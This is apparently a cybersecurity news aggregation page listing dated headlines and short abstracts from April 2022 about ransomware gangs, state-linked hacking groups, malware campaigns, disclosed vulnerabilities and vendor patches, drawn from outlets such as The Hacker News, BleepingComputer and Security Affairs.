Abstract TeamTNT hackers’ shell scripts were found disabling cloud security tools to attack AWS and Alibaba Cloud. Its payloads include credential stealers, cryptocurrency miners, persistence, and lateral movement. Organizations are suggested to continue taking the right measures to protect your systems fro ... Read More

Cyware Alerts - Hacker News

April 26, 2022 – Botnet

Emotet Testing New Delivery Ideas After Microsoft Disables VBA Macros by Default Full Text

Abstract The threat actor behind the prolific Emotet botnet is testing new attack methods on a small scale before co-opting them into their larger volume malspam campaigns, potentially in response to Microsoft's move to disable Visual Basic for Applications (VBA) macros by default across its products. Calling the new activity a "departure" from the group's typical behavior, ProofPoint alternatively  raised the possibility  that the latest set of phishing emails distributing the malware show that the operators are now "engaged in more selective and limited attacks in parallel to the typical massive scale email campaigns." Emotet, the handiwork of a cybercrime group tracked as  TA542  (aka Mummy Spider or  Gold Crestwood ), staged a  revival of sorts  late last year after a 10-month-long hiatus following a coordinated law enforcement operation to take down its attack infrastructure. Since then, Emotet  campaigns  have targeted thousands of customers with tens of

The Hacker News

April 26, 2022 – APT

Iran-linked APT Rocket Kitten exploited VMware bug in recent attacks Full Text

Abstract The Iran-linked APT group Rocket Kitten has been observed exploiting a recently patched CVE-2022-22954 VMware flaw. Iran-linked Rocket Kitten APT group has been observed exploiting a recently patched CVE-2022-22954 VMware Workspace ONE Access flaw...

Security Affairs

April 26, 2022 – Malware

Emotet malware now installs via PowerShell in Windows shortcut files Full Text

Abstract The Emotet botnet is now using Windows shortcut files (.LNK) containing PowerShell commands to infect victims computers, moving away from Microsoft Office macros that are now disabled by default.

BleepingComputer

April 26, 2022 – Malware

Prynt Stealer: A Newly Discovered Threat Full Text

Abstract Cybersecurity analysts have detected yet another info-stealer malware infection, named Prynt Stealer, offering powerful capabilities and extra keylogger and clipper modules. The developer of the stealer claims the recent version of the stealer is undetectable. Users are suggested to use a stro ... Read More

Cyware Alerts - Hacker News

April 26, 2022 – Hacker

Gold Ulrick Hackers Still in Action Despite Massive Conti Ransomware Leak Full Text

Abstract The infamous ransomware group known as Conti has  continued  its onslaught against entities despite suffering a massive data leak of its own earlier this year, according to new research. Conti, attributed to a Russia-based threat actor known as Gold Ulrick , is one of the most prevalent malware strains in the ransomware landscape, accounting for  19% of all attacks  during the three-month-period between October and December 2021. One of the most prolific ransomware groups of the last year along the likes of LockBit 2.0, PYSA, and Hive, Conti has locked the networks of hospitals, businesses, and government agencies, while receiving a ransom payment in exchange for sharing the decryption key as part of its name-and-shame scheme. But after the cybercriminal cartel came out in support of Russia over its invasion of Ukraine in February, an anonymous Ukrainian security researcher under the Twitter handle  ContiLeaks  began leaking the source code as well as private conversations between

The Hacker News

April 26, 2022 – Government

CISA adds new Microsoft, Linux, and Jenkins flaws to its Known Exploited Vulnerabilities Catalog Full Text

Abstract US Critical Infrastructure Security Agency (CISA) adds seven new flaws to its Known Exploited Vulnerabilities Catalog, including Microsoft, Linux, and Jenkins bugs. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added seven vulnerabilities...

Security Affairs

April 26, 2022 – Attack

American Dental Association hit by new Black Basta ransomware Full Text

Abstract The American Dental Association (ADA) was hit by a weekend cyberattack, causing them to shut down portions of their network while investigating the attack.

BleepingComputer

April 26, 2022 – Ransomware

Researchers Share New Insights on Nokoyawa Ransomware Full Text

Abstract Researchers from SentinelLabs claimed that Nokoyawa is clearly a variant of Nemty (Karma) ransomware. Previously, Trend Micro had highlighted similarities in the attack chain between Nokoyawa and Hive ransomware.

Cyware Alerts - Hacker News

April 26, 2022 – Attack

North Korean Hackers Target Journalists with GOLDBACKDOOR Malware Full Text

Abstract A state-backed threat actor with ties to the Democratic People's Republic of Korea (DRPK) has been attributed to a spear-phishing campaign targeting journalists covering the country with the ultimate goal of deploying a backdoor on infected Windows systems. The intrusions, said to be the work of Ricochet Chollima, resulted in the deployment of a novel malware strain called GOLDBACKDOOR, an artifact that shares technical overlaps with another malware named BLUELIGHT, which has been previously linked to the group. "Journalists are high-value targets for hostile governments," cybersecurity firm Stairwell  said  in a report published last week. "Compromising a journalist can provide access to highly-sensitive information and enable additional attacks against their sources." Ricochet Chollima, also known as  APT37 , InkySquid, and ScarCruft, is a North Korean-nexus targeted intrusion adversary that has been involved in espionage attacks since at least 2016. The

The Hacker News

April 26, 2022 – Criminals

Stormous ransomware gang claims to have hacked Coca-Cola Full Text

Abstract The Stormous ransomware gang claims to have hacked the multinational beverage corporation Coca-Cola Company. The Stormous ransomware gang announced with a post on its leak site to have hacked the multinational beverage corporation Coca-Cola...

Security Affairs

April 26, 2022 – Breach

Coca-Cola investigates hackers’ claims of breach and data theft Full Text

Abstract Coca-Cola, the world's largest soft drinks maker, has confirmed in a statement to BleepingComputer that it is aware of the reports about a cyberattack on its network and is currently investigating the claims.

BleepingComputer

April 26, 2022 – Ransomware

BlackByte Ransomware - Wilder And Scarier Than Ever Full Text

Abstract Researchers released a report on BlackByte ransomware describing new variants written in Go and DotNET, with one variant written with a mix of Go and C languages. The ransomware actors were observed making changes to the registry in an attempt to escalate privileges. Organizations are suggested to ... Read More

Cyware Alerts - Hacker News

April 26, 2022 – APT

North Korea-linked APT37 targets journalists with GOLDBACKDOOR Full Text

Abstract North Korea-linked APT37 group is targeting journalists that focus on DPRK with a new piece of malware. North Korea-linked APT37 group (aka Ricochet Chollima) has been spotted targeting journalists focusing on DPRK with a new piece of malware. The...

Security Affairs

April 26, 2022 – Privacy

Google Play Store now forces apps to disclose what data is collected Full Text

Abstract Google is rolling out a new Data Safety section on the Play Store, Android's official app repository, where developers must declare what data their software collects from users of their apps.

BleepingComputer

April 26, 2022 – Ransomware

Inside a ransomware incident: How a single mistake left a door open for attackers Full Text

Abstract The BlackCat ransomware attack against the undisclosed organization took place in March 2022 and has been detailed by cybersecurity researchers at Forescout who investigated the incident.

ZDNet

April 26, 2022 – Privacy

Anomaly Six, a US surveillance firm that tracks roughly 3 billion devices in real-time Full Text

Abstract An interesting article published by The Intercept reveals the secretive business of a US surveillance firm named Anomaly Six. When we speak about the secretive business of surveillance businesses we often refer to the powerful tools developed by Israeli...

Security Affairs

April 26, 2022 – Vulnerabilities

Public interest in Log4Shell fades but attack surface remains Full Text

Abstract It's been four months since Log4Shell, a critical zero-day vulnerability in the ubiquitous Apache Log4j library, was discovered, and threat analysts warn that the application of the available fixes is still way behind.

BleepingComputer

April 26, 2022 – Vulnerabilities

IBM database updates address critical vulnerabilities in third-party XML parser Full Text

Abstract IBM has updated its data management platform Db2 in order to protect users from a pair of critical vulnerabilities in older versions of Expat, a third-party library. Both flaws notched a CVSS score of 9.8.

The Daily Swig

April 26, 2022 – General

David Colombo on Tesla Hacks and Growing into Hacking Full Text

Abstract Cybellum interviewed David Colombo, the cyber boy wonder of Germany, and founder of Colombo Technologies for our podcast, Left to Our Own Devices. Not yet 20 years old, the prolific cyber researcher already has to his credit the exposure of numerous critical vulnerabilities, including the honor of hacking his way into Tesla vehicles.

BleepingComputer

April 26, 2022 – Criminals

Emotet Operators Use New Delivery Techniques Like OneDrive URLs and XLL Files Full Text

Abstract The activity occurred while Emotet was on a “spring break,” not conducting its typical high volume threat campaigns. The threat actor has since resumed its typical activity.

Proof Point

April 26, 2022 – Vulnerabilities

Hackers exploit critical VMware RCE flaw to install backdoors Full Text

Abstract Advanced hackers are actively exploiting a critical remote code execution (RCE) vulnerability, CVE-2022-22954, that affects in VMware Workspace ONE Access (formerly called VMware Identity Manager).

BleepingComputer

April 26, 2022 – Breach

France: Health data leak leads to $1.6 million fine against Dedalus Biologie Full Text

Abstract Following a massive health data leak disclosed in the press concerning nearly 500,000 persons in February 2021, the CNIL has fined the company Dedalus Biologie ~$1.6 million mainly for failure to comply with its data security obligation.

Lexology

April 26, 2022 – Breach

Stormous Ransomware Group Claims to Steal 161GB of Data from Coca Cola Full Text

Abstract Coca-Cola said it is investigating reports of a data breach after a ransomware group named Stormous claimed to have stolen internal documents from the American beverage giant.

The Record

April 25, 2022 – Attack

Iranian Hackers Exploiting VMware RCE Bug to Deploy ‘Core Impact’ Backdoor Full Text

Abstract An Iranian-linked threat actor known as  Rocket Kitten  has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems. Tracked as  CVE-2022-22954  (CVSS score: 9.8), the critical issue concerns a case of remote code execution (RCE) vulnerability affecting VMware Workspace ONE Access and Identity Manager. While the issue was patched by the virtualization services provider on April 6, 2022, the company  cautioned users  of confirmed exploitation of the flaw occurring in the wild a week later. "A malicious actor exploiting this RCE vulnerability potentially gains an unlimited attack surface," researchers from Morphisec Labs  said  in a new report. "This means highest privileged access into any components of the virtualized host and guest environment." Attack chains exploiting the flaw involve the distribution of a PowerShell-based stager, which is the

The Hacker News

April 25, 2022 – Government

CISA adds 7 vulnerabilities to list of bugs exploited in attacks Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added seven vulnerabilities to its list of actively exploited security issues, including those from Microsoft, Linux, and Jenkins.

BleepingComputer

April 25, 2022 – General

Zero-Day Exploits Touch Record High Full Text

Abstract Attackers are quick to zero in on zero-days these days. Google’s Project Zero tracked 58 zero-day exploits last year, implying that this is the highest number of zero-days detected.

Cyware Alerts - Hacker News

April 25, 2022 – Vulnerabilities

Researchers Report Critical RCE Vulnerability in Google’s VirusTotal Platform Full Text

Abstract Security researchers have disclosed a security vulnerability in the VirusTotal platform that could have been potentially weaponized to achieve remote code execution (RCE). The flaw, now patched, made it possible to "execute commands remotely within VirusTotal platform and gain access to its various scans capabilities," Cysource researchers Shai Alfasi and Marlon Fabiano da Silva said in a report exclusively shared with The Hacker News. VirusTotal , part of Google's Chronicle security subsidiary, is a malware-scanning service that analyzes suspicious files and URLs and checks for viruses using more than 70 third-party antivirus products. The attack method involved the upload of a DjVu file through the platform's  web user interface , using it to trigger an exploit for a high-severity remote code execution flaw in  ExifTool , an open-source utility used to read and edit EXIF metadata information in image and PDF files. Tracked as  CVE-2021-22204  (CVSS score: 7.

The Hacker News

April 25, 2022 – Government

Iran announced to have foiled massive cyberattacks on public services Full Text

Abstract State television announced that Iran has foiled massive cyberattacks that targeted public services operated by both government and private organizations. According to the Iran state television, the attack attempts took place in recent days and aimed...

Security Affairs

April 25, 2022 – Malware

Emotet malware infects users again after fixing broken installer Full Text

Abstract The Emotet malware phishing campaign is up and running again after the threat actors fixed a bug preventing people from becoming infected when they opened malicious email attachments.

BleepingComputer

April 25, 2022 – Phishing

This sneaky phishing attack tries to steal your Facebook password Full Text

Abstract As part of the fake appeals process, the user is asked to provide sensitive information, including their name and email address. Before submitting the form, the user is also asked to enter their Facebook password.

ZDNet

April 25, 2022 – Cryptocurrency

Critical Bug in Everscale Wallet Could’ve Let Attackers Steal Cryptocurrencies Full Text

Abstract A security vulnerability has been disclosed in the web version of the Ever Surf wallet that, if successfully weaponized, could allow an attacker to gain full control over a victim's wallet. "By exploiting the vulnerability, it's possible to decrypt the private keys and seed phrases that are stored in the browser's local storage," Israeli cybersecurity company Check Point said in a report shared with The Hacker News. "In other words, attackers could gain full control over the victim's wallets." Ever Surf  is a cryptocurrency wallet for the Everscale (formerly FreeTON) blockchain that also doubles up as a cross-platform messenger and allows users to access decentralized apps as well as send and receive non-fungible tokens (NFTs). It's said to have an  estimated  669,700 accounts across the world. By means of different attack vectors like malicious browser extensions or phishing links, the flaw makes it possible to obtain a wallet's encr

The Hacker News

April 25, 2022 – Criminals

BlackCat Ransomware gang breached over 60 orgs worldwide Full Text

Abstract At least 60 entities worldwide have been breached by BlackCat ransomware, warns a flash report published by the U.S. FBI. The U.S. Federal Bureau of Investigation (FBI) published a flash report that states that at least 60 entities worldwide have...

Security Affairs

April 25, 2022 – Hacker

North Korean hackers targeting journalists with novel malware Full Text

Abstract North Korean state-sponsored hackers known as APT37 have been discovered targeting journalists specializing in the DPRK with a novel malware strain.

BleepingComputer

April 25, 2022 – Malware

The ink-stained trail of GOLDBACKDOOR Full Text

Abstract Stairwell assesses with medium-high confidence that GOLDBACKDOOR is the successor of, or used in parallel with, the malware BLUELIGHT, attributed to APT37 / Ricochet Chollima.

Stairwell

April 25, 2022 – Malware

New BotenaGo Malware Variant Targeting Lilin Security Camera DVR Devices Full Text

Abstract A new variant of an IoT botnet called BotenaGo has emerged in the wild, specifically singling out Lilin security camera DVR devices to infect them with Mirai malware. Dubbed " Lilin Scanner " by Nozomi Networks, the  latest version  is designed to exploit a two-year-old critical  command injection vulnerability  in the DVR firmware that was patched by the Taiwanese company in February 2020. BotenaGo , first documented in November 2021 by AT&T Alien Labs, is written in Golang and features over 30 exploits for known vulnerabilities in web servers, routers and other kinds of IoT devices. The botnet's source code has since been uploaded to GitHub, making it ripe for abuse by other criminal actors. "With only 2,891 lines of code, BotenaGo has the potential to be the starting point for many new variants and new malware families using its source code," the researchers  said  this year. The new BotenaGo malware is the  latest  to exploit vulnerabilities in Lil

The Hacker News

April 25, 2022 – General

Experts warn of a surge in zero-day flaws observed and exploited in 2021 Full Text

Abstract The number of zero-day vulnerabilities exploited in cyberattacks in the wild exploded in the last years, security firm report. Google and Mandiant have published two reports that highlight a surge in the discovery of zero-day flaws exploited by threat...

Security Affairs

April 25, 2022 – Outage

French hospital group disconnects Internet after hackers steal data Full Text

Abstract The GHT Coeur Grand Est. Hospitals and Health Care group comprising nine establishments with 3,370 beds across Northeast France has disclosed a cyberattack that resulted in the theft of sensitive administrative and patient data.

BleepingComputer

April 25, 2022 – Malware

Defeating BazarLoader Anti-Analysis Techniques Full Text

Abstract It employs two distinctive anti-analysis techniques. The first is API function hashing, a known trick to obfuscate which functions are called. The second is an opaque predicate, a technique used for control flow obfuscation.

Palo Alto Networks

April 25, 2022 – Malware

New powerful Prynt Stealer malware sells for just $100 per month Full Text

Abstract Threat analysts have spotted yet another addition to the growing space of info-stealer malware infections, named Prynt Stealer, which offers powerful capabilities and extra keylogger and clipper modules.

BleepingComputer

April 25, 2022 – General

Medical device cybersecurity: What to expect in 2022? Full Text

Abstract Medical device cybersecurity has become an extremely complex challenge. It is now more important than ever to learn from industry peers and try to find the best way forward.

Help Net Security

April 25, 2022 – Ransomware

Quantum ransomware seen deployed in rapid network attacks Full Text

Abstract The Quantum ransomware, a strain first discovered in August 2021, were seen carrying out speedy attacks that escalate quickly, leaving defenders little time to react.

BleepingComputer

April 25, 2022 – General

41% of businesses had an API security incident last year Full Text

Abstract In the wake of the digital transformation wave, web APIs have experienced exponential growth as the rise of integrated web and mobile-based offerings requires significantly more data sharing across products.

Help Net Security

April 24, 2022 – Government

FBI Warns of BlackCat Ransomware That Breached Over 60 Organisations Worldwide Full Text

Abstract The U.S. Federal Bureau of Investigation (FBI) is sounding the alarm on the BlackCat ransomware-as-a-service (RaaS), which it said victimized at least 60 entities worldwide between as of March 2022 since its emergence last November. Also called ALPHV and  Noberus , the ransomware is notable for being the first-ever malware written in the Rust programming language that's known to be memory safe and offer improved performance. "Many of the developers and money launderers for BlackCat/ALPHV are linked to  DarkSide / BlackMatter , indicating they have extensive networks and experience with ransomware operations," the FBI said in an  advisory  published last week. The disclosure comes weeks after twin reports from  Cisco Talos  and  Kasperksy  uncovered links between BlackCat and BlackMatter ransomware families, including the use of a modified version of a data exfiltration tool dubbed Fendr that's been previously only observed in BlackMatter-related activity. "

The Hacker News

April 24, 2022 – Vulnerabilities

Atlassian addresses a critical Jira authentication bypass flaw Full Text

Abstract Atlassian fixed a critical flaw in its Jira software, tracked as CVE-2022-0540, that could be exploited to bypass authentication. Atlassian has addressed a critical vulnerability in its Jira Seraph software, tracked as CVE-2022-0540 (CVSS score 9.9),...

Security Affairs

April 24, 2022 – Breach

Since declaring cyber war on Russia Anonymous leaked 5.8 TB of Russian data Full Text

Abstract OpRussia continues unabated, since declaring 'cyber war' on Russia Anonymous has now published approximately 5.8 TB of Russian data. The #OpRussia launched by Anonymous on Russia after the criminal invasion of Ukraine continues to collect successes,...

Security Affairs

April 24, 2022 – General

Apr 17 – Apr 23 Ukraine – Russia the silent cyber conflict Full Text

Abstract This post provides a timeline of the events related to the Russian invasion of Ukraine from the cyber security perspective. Below is the timeline of the events related to the ongoing invasion that occurred in the previous weeks: April 23 - Phishing...

Security Affairs

April 24, 2022 – General

Security Affairs newsletter Round 362 by Pierluigi Paganini Full Text

Abstract A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....

Security Affairs

April 23, 2022 – Attack

Conti ransomware claims responsibility for the attack on Costa Rica Full Text

Abstract Costa Rican businesses fear that the ransomware gang could have infiltrated confidential information they provided to the government. The leak of this data could pose a serious risk to these organizations.

Security Affairs

April 23, 2022 – Breach

T-Mobile confirms Lapsus$ had access its systems Full Text

Abstract Telecommunication giant T-Mobile confirmed the LAPSUS$ extortion group gained access to its networks in March. Telecom company T-Mobile on Friday revealed that LAPSUS$ extortion gang gained access to its networks. The popular investigator...

Security Affairs

April 23, 2022 – Breach

Hackers Claim to Target Russian Institutions in Barrage of Cyberattacks and Leaks Full Text

Abstract Hackers claim to have broken into dozens of Russian institutions over the past two months, including the Kremlin’s internet censor and one of its primary intelligence services, leaking emails and internal documents to the public.

New York Times

April 23, 2022 – Vulnerabilities

Are you using Java 15/16/17 or 18 in production? Patch them now! Full Text

Abstract A researcher has released proof-of-concept (PoC) code for a digital signature bypass vulnerability in Java. Security researcher Khaled Nassar released a proof-of-concept (PoC) code for a new digital signature bypass vulnerability, tracked as CVE-2022-21449 (CVSS...

Security Affairs

April 23, 2022 – Phishing

Phishing attacks using the topic “Azovstal” targets entities in Ukraine Full Text

Abstract Ukraine CERT-UA warns of phishing attacks on state organizations of Ukraine using the topic "Azovstal" and Cobalt Strike Beacon. The Computer Emergency Response Team of Ukraine (CERT-UA) warns of phishing attacks aimed at organizations in the country...

Security Affairs

April 22, 2022

T-Mobile Admits Lapsus$ Hackers Gained Access to its Internal Tools and Source Code Full Text

Abstract Telecom company T-Mobile on Friday confirmed that it was the victim of a security breach in March after the LAPSUS$ mercenary gang managed to gain access to its networks. The acknowledgment came after investigative journalist Brian Krebs  shared  internal chats belonging to the core members of the group indicating that LAPSUS$ breached the company several times in March  prior to the arrest  of its seven members. T-Mobile, in a statement, said that the incident occurred "several weeks ago, with the "bad actor" using stolen credentials to access internal systems. "The systems accessed contained no customer or government information or other similarly sensitive information, and we have no evidence that the intruder was able to obtain anything of value," it added. The VPN credentials for initial access are said to have been obtained from illicit websites like Russian Market with the goal of gaining control of T-Mobile employee accounts, ultimately allowing

The Hacker News

April 22, 2022 – Vulnerabilities

Atlassian Drops Patches for Critical Jira Authentication Bypass Vulnerability Full Text

Abstract Atlassian has published a security advisory warning of a critical vulnerability in its Jira software that could be abused by a remote, unauthenticated attacker to circumvent authentication protections. Tracked as  CVE-2022-0540 , the flaw is rated 9.9 out of 10 on the CVSS scoring system and resides in Jira's authentication framework, Jira Seraph. Khoadha of Viettel Cyber Security has been credited with discovering and reporting the security weakness. "A remote, unauthenticated attacker could exploit this by sending a specially crafted HTTP request to bypass authentication and authorization requirements in WebWork actions using an affected configuration," Atlassian  noted . The flaw affects the following Jira products - Jira Core Server, Jira Software Server and Jira Software Data Center: All versions before 8.13.18, 8.14.x, 8.15.x, 8.16.x, 8.17.x, 8.18.x, 8.19.x, 8.20.x before 8.20.6, and 8.21.x Jira Service Management Server and Jira Service Management Data Cent

The Hacker News

April 22, 2022 – Vulnerabilities

‘Hack DHS’ bug hunters find 122 security flaws in DHS systems Full Text

Abstract The Department of Homeland Security (DHS) today revealed that bug bounty hunters enrolled in its 'Hack DHS' bug bounty program have found 122 security vulnerabilities in external DHS systems, 27 of them rated critical severity.

BleepingComputer

April 22, 2022 – General

Financial Sector Faces Ransomware Attacks, Now More Than Ever Full Text

Abstract A new VMware report states that threat actors have moved from hacking wire transfers to targeting market data. Around 75% faced at least one ransomware attack, among which 63% paid the ransom.

Cyware Alerts - Hacker News

April 22, 2022 – Vulnerabilities

Researcher Releases PoC for Recent Java Cryptographic Vulnerability Full Text

Abstract A proof-of-concept (PoC) code demonstrating a newly disclosed digital signature bypass vulnerability in Java has been shared online.  The  high-severity flaw  in question,  CVE-2022-21449  (CVSS score: 7.5), impacts the following version of Java SE and Oracle GraalVM Enterprise Edition - Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18 Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1, 22.0.0.2 The issue resides in Java's implementation of the Elliptic Curve Digital Signature Algorithm ( ECDSA ), a  cryptographic mechanism  to  digitally sign  messages and data for verifying the authenticity and the integrity of the contents. In a nutshell, the cryptographic blunder — dubbed Psychic Signatures in Java — makes it possible to present a totally blank signature, which would still be perceived as valid by the vulnerable implementation. Successful exploitation of the flaw could permit an attacker to forge signatures and bypass authentication measures put in place. The PoC, p

The Hacker News

April 22, 2022 – Attack

Conti ransomware claims responsibility for the attack on Costa Rica Full Text

Abstract Conti ransomware gang claimed responsibility for a ransomware attack that hit the government infrastructure of Costa Rica. Last week a ransomware attack has crippled the government infrastructure of Costa Rica causing chaos. The Conti ransomware...

Security Affairs

April 22, 2022 – Hacker

Russian hackers are seeking alternative money-laundering options Full Text

Abstract The Russian cybercrime community, one of the most active and prolific in the world, is turning to alternative money-laundering methods due to sanctions on Russia and law enforcement actions against dark web markets.

BleepingComputer

April 22, 2022 – Malware

Emotet Revamp: New Payloads and 64-Bit Modules Full Text

Abstract According to Kaspersky, Emotet infection has seen a ten-fold increase from February to March, going from 3,000 to 30,000 emails. It is switching to new payloads detected by fewer antivirus engines.

Cyware Alerts - Hacker News

April 22, 2022 – Cryptocurrency

Watch Out! Cryptocurrency Miners Targeting Dockers, AWS and Alibaba Cloud Full Text

Abstract LemonDuck, a cross-platform cryptocurrency mining botnet, is targeting Docker to mine cryptocurrency on Linux systems as part of an active malware campaign. "It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses," CrowdStrike  said  in a new report. "It evades detection by targeting Alibaba Cloud's monitoring service and disabling it." Known to strike both Windows and Linux environments, LemonDuck is primarily engineered for abusing the system resources to mine Monero. But it's also capable of credential theft, lateral movement, and facilitating the deployment of additional payloads for follow-on activities. "It uses a wide range of spreading mechanisms — phishing emails, exploits, USB devices, brute force, among others — and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns," Microsoft  detailed  in a technical write-up of the ma

The Hacker News

April 22, 2022 – General

Cyber Insurance and the Changing Global Risk Environment Full Text

Abstract When security fails, cyber insurance can become crucial for ensuring continuity. Cyber has changed everything around us - even the way we tackle geopolitical crisis and conflicts. WhenEinstein was asked what a war will look like in the future, he couldn't...

Security Affairs

April 22, 2022 – Government

US govt grants academics $12M to develop cyberattack defense tools Full Text

Abstract The US Department of Energy (DOE) has announced that it will provide $12 million in funding to six university teams to develop defense and mitigation tools to protect US energy delivery systems from cyberattacks.

BleepingComputer

April 22, 2022 – Government

NIST revamps aging enterprise patch management guidance Full Text

Abstract Whereas the previous, 2013 iteration focused on helping organizations to deploy patch management technologies, the new edition centers on developing strategies for patch management.

The Daily Swig

April 22, 2022 – Vulnerabilities

QNAP Advises Users to Update NAS Firmware to Patch Apache HTTP Vulnerabilities Full Text

Abstract Network-attached storage (NAS) appliance maker QNAP on Thursday said it's investigating its lineup for potential impact arising from two security vulnerabilities that were addressed in the Apache HTTP server last month. The critical flaws, tracked as  CVE-2022-22721 and CVE-2022-23943 , are rated 9.8 for severity on the CVSS scoring system and impact Apache HTTP Server versions 2.4.52 and earlier - CVE-2022-22721  - Possible buffer overflow with very large or unlimited LimitXMLRequestBody CVE-2022-23943  - Out-of-bounds Write vulnerability in mod_sed of Apache HTTP Server Both the vulnerabilities, alongside CVE-2022-22719 and CVE-2022-22720, were remediated by the project maintainers as part of  version 2.4.53 , which was shipped on March 14, 2022. "While CVE-2022-22719 and CVE-2022-22720 do not affect QNAP products, CVE-2022-22721 affects 32-bit QNAP NAS models, and CVE-2022-23943 affects users who have enabled mod_sed in Apache HTTP Server on their QNAP device,"

The Hacker News

April 22, 2022 – Vulnerabilities

A stored XSS flaw in RainLoop allows stealing users’ emails Full Text

Abstract Experts disclose an unpatched vulnerability in the RainLoop webmail client, tracked as CVE-2022-29360, that can be exploited to steal users' emails. RainLoop is an open-source web-based email client used by thousands of organizations, which is affected...

Security Affairs

April 22, 2022 – Breach

T-Mobile confirms Lapsus$ hackers breached internal systems Full Text

Abstract T-Mobile has confirmed that the Lapsus$ extortion gang breached its network "several weeks ago" using stolen credentials and gained access to internal systems.

BleepingComputer

April 22, 2022 – Vulnerabilities

Several Critical Vulnerabilities Affect SmartPPT, SmartICS Industrial Products Full Text

Abstract A security researcher has discovered several vulnerabilities, including ones rated critical- and high-severity, in industrial products made by Elcomplus, a Russian company specializing in professional radio communications and industrial automation.

Security Week

April 22, 2022 – Vulnerabilities

QNAP firmware updates fix Apache HTTP vulnerabilities in its NAS Full Text

Abstract Taiwanese vendor QNAP warns users to update their NAS Firmware to fix Apache HTTP flaws addressed in the Apache HTTP server last month. Taiwanese vendor QNAP warns users to update their NAS Firmware to address Apache HTTP vulnerabilities, tracked...

Security Affairs

April 22, 2022 – Hacker

Chinese hackers behind most zero-day exploits during 2021 Full Text

Abstract Threat analysts report that zero-day vulnerability exploitation is on the rise with Chinese hackers using most of them in attacks last year.

BleepingComputer

April 22, 2022 – Botnet

Android Bianlian Botnet Tries to Bypass Photo TAN Authentication Used for Mobile Banking Full Text

Abstract The Android malware typically poses as a video player, Google Play app, or a mobile banking application. Once installed, it asks the victim to activate Accessibility Services for the app to “work correctly.”

Fortinet

April 22, 2022 – General

Pwn2Own Miami hacking contest awarded $400,000 for 26 unique ICS exploits Full Text

Abstract Which hat hackers that participated in the Pwn2Own Miami 2022 hacking contest earned a total of $400,000 for their ICS exploits. The Pwn2Own Miami 2022 is a hacking contest organized by Trend Micro’s Zero Day Initiative (ZDI) that focuses on demonstrating...

Security Affairs

April 22, 2022 – Vulnerabilities

Atlassian fixes critical Jira authentication bypass vulnerability Full Text

Abstract Atlassian has published a security advisory to alert that its Jira and Jira Service Management products are affected by a critical authentication bypass vulnerability in Seraph, the company's web application security framework.

BleepingComputer

April 22, 2022 – General

The Great Resignation meets the Great Exfiltration: How to securely offboard security personnel Full Text

Abstract Considering the Great Exfiltration, it is vital for organizations to create and implement a robust data loss prevention (DLP) strategy during the offboarding process to prevent any destruction or loss of data.

Help Net Security

April 22, 2022 – Botnet

Lemon_Duck cryptomining botnet targets Docker servers Full Text

Abstract The Lemon_Duck cryptomining botnet is targeting Docker servers to mine cryptocurrency on Linux systems. Crowdstrikes researchers reported that the Lemon_Duck cryptomining botnet is targeting Docker to mine cryptocurrency on Linux systems....

Security Affairs

April 22, 2022 – Vulnerabilities

Windows 10 KB5012636 cumulative update fixes freezing issues Full Text

Abstract Microsoft has released the optional KB5012636 cumulative update preview for Windows 10 1809 and Windows Server 2019, with fixes for system freezing issues affecting client and server systems.

BleepingComputer

April 22, 2022 – Hacker

TeamTNT Targets Linux Instances on AWS, Alibaba Cloud for Credential Theft and Cryptomining Full Text

Abstract TeamTNT is actively modifying its scripts after they were made public by security researchers. These scripts primarily target Amazon Web Services, but can also run in on-premise, container, or other forms of Linux instances.

Cisco Talos

April 21, 2022 – Vulnerabilities

Cisco Releases Security Patches for TelePresence, RoomOS and Umbrella VA Full Text

Abstract Networking equipment maker Cisco has released security updates to address three high-severity vulnerabilities in its products that could be exploited to cause a denial-of-service (DoS) condition and take control of affected systems. The first of the three flaws,  CVE-2022-20783  (CVSS score: 7.5), affects Cisco TelePresence Collaboration Endpoint (CE) Software and Cisco RoomOS Software, and stems from a lack of proper input validation, allowing an unauthenticated, remote attacker to send specially crafted traffic to the devices. "A successful exploit could allow the attacker to cause the affected device to either reboot normally or reboot into maintenance mode, which could result in a DoS condition on the device," the company  noted  in an advisory. Credited with discovering and reporting the flaw is the U.S. National Security Agency (NSA). The issue has been addressed in Cisco TelePresence CE Software versions 9.15.10.8 and 10.11.2.2. CVE-2022-20773  (CVSS score: 7.5),

The Hacker News

April 21, 2022 – Attack

Docker servers hacked in ongoing cryptomining malware campaign Full Text

Abstract Docker APIs on Linux servers are being targeted by a large-scale Monero crypto-mining campaign from the operators of the Lemon_Duck botnet.

BleepingComputer

April 21, 2022 – Vulnerabilities

Cisco Patches Virtual Conference Software Vulnerability Reported by NSA Full Text

Abstract Tracked as CVE-2022-20783 (CVSS score of 7.5), the NSA-reported flaw is a denial of service (DoS) issue in TelePresence Collaboration Endpoint (CE) and RoomOS software, which could be exploited remotely, without authentication.

Security Week

April 21, 2022 – Malware

Hackers Sneak ‘More_Eggs’ Malware Into Resumes Sent to Corporate Hiring Managers Full Text

Abstract A new set of phishing attacks delivering the more_eggs malware has been observed striking corporate hiring managers with bogus resumes as an infection vector, a year after potential candidates looking for work on LinkedIn were lured with weaponized job offers . "This year the more_eggs operation has flipped the social engineering script, targeting hiring managers with fake resumes instead of targeting jobseekers with fake job offers," eSentire's research and reporting lead, Keegan Keplinger, said in a statement . The Canadian cybersecurity company said it identified and disrupted four separate security incidents, three of which occurred at the end of March. Targeted entities include a U.S.-based aerospace company, an accounting business located in the U.K., a law firm, and a staffing agency, both based out of Canada. The malware, suspected to be the handiwork of a threat actor called Golden Chickens (aka Venom Spider ), is a stealthy, modular backdoor suite capable

The Hacker News

April 21, 2022 – Vulnerabilities

Critical bug in decoder used by popular chipsets exposes 2/3 of Android devices to hack Full Text

Abstract A critical RCE flaw in Android devices running on Qualcomm and MediaTek chipsets could allow access to users' media files. Security researchers at Check Point Research have discovered a critical remote code execution that affects the implementation...

Security Affairs

April 21, 2022 – Hacker

Hackers earn $400K for zero-day ICS exploits demoed at Pwn2Own Full Text

